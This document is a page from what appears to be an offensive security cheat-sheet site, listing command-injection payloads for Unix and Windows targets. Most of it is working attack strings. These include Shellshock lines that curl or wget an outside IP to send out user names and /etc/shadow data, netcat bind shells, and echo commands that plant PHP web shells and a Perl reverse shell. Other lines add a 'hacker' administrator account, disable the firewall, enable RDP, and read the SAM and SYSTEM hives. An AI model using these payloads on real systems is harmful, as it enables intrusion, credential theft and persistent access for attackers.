pwny.cc
Search…
Home
WEB ATTACKS
Misc
OAuth
Open Redirect
Command Injection
Local File Inclusion (LFI)
Insecure File Upload
Insecure Direct Object Reference (IDOR)
SQL Injection (SQLi)
Cross-Site Scripting (XSS)
Server Side Request Forgery (SSRF)
Server Side Template Injection (SSTI)
XML External Entity (XXE)
SHELLS
Misc
Web Shells
Reverse Shells
Obfuscated Shells
SO
Linux
Windows
OTHER
Sandbox Escape
Cracking
Powered By GitBook
Command Injection

Unix

1
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
2
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
3
<!--#exec%20cmd="/usr/bin/id;-->
4
<!--#exec%20cmd="/usr/bin/id;-->
5
/index.html|id|
6
;id;
7
;id
8
;netstat -a;
9
;system('cat%20/etc/passwd')
10
;id;
11
|id
12
|/usr/bin/id
13
|id|
14
|/usr/bin/id|
15
||/usr/bin/id|
16
|id;
17
||/usr/bin/id;
18
;id|
19
;|/usr/bin/id|
20
\n/bin/ls -al\n
21
\n/usr/bin/id\n
22
\nid\n
23
\n/usr/bin/id;
24
\nid;
25
\n/usr/bin/id|
26
\nid|
27
;/usr/bin/id\n
28
;id\n
29
|usr/bin/id\n
30
|nid\n
31
`id`
32
`/usr/bin/id`
33
a);id
34
a;id
35
a);id;
36
a;id;
37
a);id|
38
a;id|
39
a)|id
40
a|id
41
a)|id;
42
a|id
43
|/bin/ls -al
44
a);/usr/bin/id
45
a;/usr/bin/id
46
a);/usr/bin/id;
47
a;/usr/bin/id;
48
a);/usr/bin/id|
49
a;/usr/bin/id|
50
a)|/usr/bin/id
51
a|/usr/bin/id
52
a)|/usr/bin/id;
53
a|/usr/bin/id
54
;system('cat%20/etc/passwd')
55
;system('id')
56
;system('/usr/bin/id')
57
%0Acat%20/etc/passwd
58
%0A/usr/bin/id
59
%0Aid
60
%0A/usr/bin/id%0A
61
%0Aid%0A
62
& ping -i 30 127.0.0.1 &
63
& ping -n 30 127.0.0.1 &
64
%0a ping -i 30 127.0.0.1 %0a
65
`ping 127.0.0.1`
66
| id
67
& id
68
; id
69
%0a id %0a
70
`id`
71
$;/usr/bin/id
72
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
73
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
74
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
75
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
76
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
77
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
78
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
79
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
80
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
81
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
82
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
83
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
84
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
85
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
86
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
87
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
88
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
89
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
90
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
91
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
92
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
93
cat /etc/hosts
94
$(`cat /etc/passwd`)
95
cat /etc/passwd
96
%0Acat%20/etc/passwd
97
{{ get_user_file("/etc/passwd") }}
98
<!--#exec cmd="/bin/cat /etc/passwd"-->
99
<!--#exec cmd="/bin/cat /etc/shadow"-->
100
<!--#exec cmd="/usr/bin/id;-->
101
system('cat /etc/passwd');
102
<?php system("cat /etc/passwd");?>
Copied!

Windows

1
`
2
||
3
|
4
;
5
'
6
'"
7
"
8
"'
9
&
10
&&
11
%0a
12
%0a%0d
13
%0a ping -i 30 127.0.0.1 %0a
14
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
15
%20{${phpinfo()}}
16
%20{${sleep(20)}}
17
%20{${sleep(3)}}
18
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
19
| curl http://crowdshield.com/.testing/rce.txt
20
& curl http://crowdshield.com/.testing/rce.txt
21
; curl https://crowdshield.com/.testing/rce_vuln.txt
22
&& curl https://crowdshield.com/.testing/rce_vuln.txt
23
curl https://crowdshield.com/.testing/rce_vuln.txt
24
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
25
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
26
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
27
dir
28
| dir
29
; dir
30
$(`dir`)
31
& dir
32
&&dir
33
&& dir
34
| dir C:\
35
; dir C:\
36
& dir C:\
37
&& dir C:\
38
dir C:\
39
| dir C:\Documents and Settings\*
40
; dir C:\Documents and Settings\*
41
& dir C:\Documents and Settings\*
42
&& dir C:\Documents and Settings\*
43
dir C:\Documents and Settings\*
44
| dir C:\Users
45
; dir C:\Users
46
& dir C:\Users
47
&& dir C:\Users
48
dir C:\Users
49
;echo%20'<script>alert(1)</script>'
50
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
51
| echo "<?php include($_GET['page'])| ?>" > rfi.php
52
; echo "<?php include($_GET['page']); ?>" > rfi.php
53
& echo "<?php include($_GET['page']); ?>" > rfi.php
54
&& echo "<?php include($_GET['page']); ?>" > rfi.php
55
echo "<?php include($_GET['page']); ?>" > rfi.php
56
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
57
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
58
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
59
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
60
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
61
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
62
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
63
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
64
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
65
echo "<?php system($_GET['cmd']); ?>" > cmd.php
66
;echo '<script>alert(1)</script>'
67
echo '<script>alert(1)</script>'// XXXXXXXXXXX
68
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
69
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
70
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
71
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
72
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
73
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
74
() { :;}; echo vulnerable 10
75
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
76
eval('ls')
77
eval('pwd')
78
eval('pwd');
79
eval('sleep 5')
80
eval('sleep 5');
81
eval('whoami')
82
eval('whoami');
83
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
84
exec('ls')
85
exec('pwd')
86
exec('pwd');
87
exec('sleep 5')
88
exec('sleep 5');
89
exec('whoami')
90
exec('whoami');
91
;{$_GET["cmd"]}
92
/index.html|id|
93
ipconfig
94
| ipconfig /all
95
; ipconfig /all
96
& ipconfig /all
97
&& ipconfig /all
98
ipconfig /all
99
\n
100
| net localgroup Administrators hacker /ADD
101
; net localgroup Administrators hacker /ADD
102
& net localgroup Administrators hacker /ADD
103
&& net localgroup Administrators hacker /ADD
104
net localgroup Administrators hacker /ADD
105
| netsh firewall set opmode disable
106
; netsh firewall set opmode disable
107
& netsh firewall set opmode disable
108
&& netsh firewall set opmode disable
109
netsh firewall set opmode disable
110
netstat
111
;netstat -a;
112
| netstat -an
113
; netstat -an
114
& netstat -an
115
&& netstat -an
116
netstat -an
117
| net user hacker Password1 /ADD
118
; net user hacker Password1 /ADD
119
& net user hacker Password1 /ADD
120
&& net user hacker Password1 /ADD
121
net user hacker Password1 /ADD
122
| net view
123
; net view
124
& net view
125
&& net view
126
net view
127
`ping 127.0.0.1`
128
& ping -i 30 127.0.0.1 &
129
& ping -n 30 127.0.0.1 &
130
;${@print(md5(RCEVulnerable))};
131
${@print("RCEVulnerable")}
132
${@print(system($_SERVER['HTTP_USER_AGENT']))}
133
pwd
134
| pwd
135
; pwd
136
& pwd
137
&& pwd
138
\r
139
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
140
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
141
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
142
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
143
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
144
\r\n
145
route
146
| sleep 1
147
; sleep 1
148
& sleep 1
149
&& sleep 1
150
sleep 1
151
|| sleep 10
152
| sleep 10
153
; sleep 10
154
{${sleep(10)}}
155
& sleep 10
156
&& sleep 10
157
sleep 10
158
|| sleep 15
159
| sleep 15
160
; sleep 15
161
& sleep 15
162
&& sleep 15
163
{${sleep(20)}}
164
{${sleep(20)}}
165
{${sleep(3)}}
166
{${sleep(3)}}
167
| sleep 5
168
; sleep 5
169
& sleep 5
170
&& sleep 5
171
sleep 5
172
{${sleep(hexdec(dechex(20)))}}
173
{${sleep(hexdec(dechex(20)))}}
174
sysinfo
175
| sysinfo
176
; sysinfo
177
& sysinfo
178
&& sysinfo
179
systeminfo
180
| systeminfo
181
; systeminfo
182
& systeminfo
183
&& systeminfo
184
$(`type C:\boot.ini`)
185
&&type C:\\boot.ini
186
| type C:\Windows\repair\SAM
187
; type C:\Windows\repair\SAM
188
& type C:\Windows\repair\SAM
189
&& type C:\Windows\repair\SAM
190
type C:\Windows\repair\SAM
191
| type C:\Windows\repair\SYSTEM
192
; type C:\Windows\repair\SYSTEM
193
& type C:\Windows\repair\SYSTEM
194
&& type C:\Windows\repair\SYSTEM
195
type C:\Windows\repair\SYSTEM
196
| type C:\WINNT\repair\SAM
197
; type C:\WINNT\repair\SAM
198
& type C:\WINNT\repair\SAM
199
&& type C:\WINNT\repair\SAM
200
type C:\WINNT\repair\SAM
201
type C:\WINNT\repair\SYSTEM
202
| type %SYSTEMROOT%\repair\SAM
203
; type %SYSTEMROOT%\repair\SAM
204
& type %SYSTEMROOT%\repair\SAM
205
&& type %SYSTEMROOT%\repair\SAM
206
type %SYSTEMROOT%\repair\SAM
207
| type %SYSTEMROOT%\repair\SYSTEM
208
; type %SYSTEMROOT%\repair\SYSTEM
209
& type %SYSTEMROOT%\repair\SYSTEM
210
&& type %SYSTEMROOT%\repair\SYSTEM
211
type %SYSTEMROOT%\repair\SYSTEM
212
whoami
213
| whoami
214
; whoami
215
' whoami
216
' || whoami
217
' & whoami
218
' && whoami
219
'; whoami
220
" whoami
221
" || whoami
222
" | whoami
223
" & whoami
224
" && whoami
225
"; whoami
226
$(`whoami`)
227
& whoami
228
&& whoami
Copied!
Previous
Open Redirect to XSS
Next - WEB ATTACKS
Local File Inclusion (LFI)
Last modified 8mo ago
Copy link
Contents
Unix
Windows